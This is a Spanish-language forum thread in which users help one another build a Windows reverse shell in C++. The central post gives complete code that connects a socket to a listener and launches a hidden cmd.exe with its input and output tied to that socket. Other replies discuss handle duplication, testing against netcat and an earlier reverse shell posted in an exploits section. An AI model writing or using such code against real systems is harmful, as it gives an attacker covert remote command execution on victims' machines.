Estaba leyendo la msdn y por lo que e visto tambien soporta dup2, en Windows es llamada _dup2.


No hace falta que escriba una, recuerdo haber posteado una reverse shell en Bugs y Exploits pero para un sistema orientado a BSD, pero puedes guiarte, tiene algun tiempo podria hacer una mejor, pero esa ya te vale.


Un saludo.

@cpu2 probe con eso que me decías del handle,, pero me parece que no es eso,, o al menos los valores se copian.. investigue que en windows también existe la función DuplicateHandle (con la cual también probé, pero no me funciona aun)

Así esta todo el código.. si alguien quiere revisarlo,, 

#include <WinSock2.h>
#pragma comment(lib,"ws2_32.lib")
 
#define PORT 8080
#define IP "127.0.0.1"
#define DEFAULT_BUFLEN 510
#include <iostream>
using namespace std;
 
// ESTRUCTURAS PARA SOCKET
WSADATA WSA;			//--> ESTRUCTURA WSADATA;
SOCKET Socket;			//--> VARIABLE DE TIPO SOCKET
SOCKADDR_IN SA_IN;		//--> ESTRUCTURA SOCKADDR_IN
// ESTRUCTURAS PARA PROCESOS
STARTUPINFOA SI;
PROCESS_INFORMATION PI;
// ---------------------------------------------------
 
int main()
{
	// SOCKET
	WSAStartup(MAKEWORD(2, 2), &WSA);
	Socket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);
 
	SA_IN.sin_family	  = AF_INET;
	SA_IN.sin_port		  = htons(PORT);
	SA_IN.sin_addr.s_addr = inet_addr(IP);
 
	connect(Socket, (struct sockaddr*)&SA_IN, sizeof(SA_IN));
//  ---------------------------------------------------------------
 
	SI.cb				  = sizeof(SI);
	SI.wShowWindow		  = SW_HIDE;
	SI.dwFlags			  = STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES;
	SI.lpDesktop	      = SI.lpTitle = 0x0000;
	SI.lpReserved2		  = NULL;
 
	SI.hStdInput		  = SI.hStdOutput = SI.hStdError = (HANDLE)Socket;
 
 
	LPSTR szCmdline		  = "cmd.exe";
	CreateProcessA(NULL, szCmdline, NULL, NULL, TRUE, 0, NULL, NULL, &SI, &PI);
 
	return 0;
}
 

AWWGGRR!! El problema es el server si.. con netcat funciona.. creo que existe el código de nc,, tendría que ver por que mi cliente no mantiene la conexión estable..

Gracias!! Saludos!!

me suena un cliente para esa reverse shell (o muy parecida) en vb6..... pero el link no funciona


creía recordar que tenía ese code....pero no lo he encontrado..........

el mail del autor lo encuentras fijos y el code lo tiene algun mod fijo.......

si el problema lo tienes con el cliente en .net........

el debug que ofrece m$ es muy bueno....no.....noooo?

Gracias por compartir los códigos me sirvieron de mucha ayuda, debido a que soy un Newie en esto.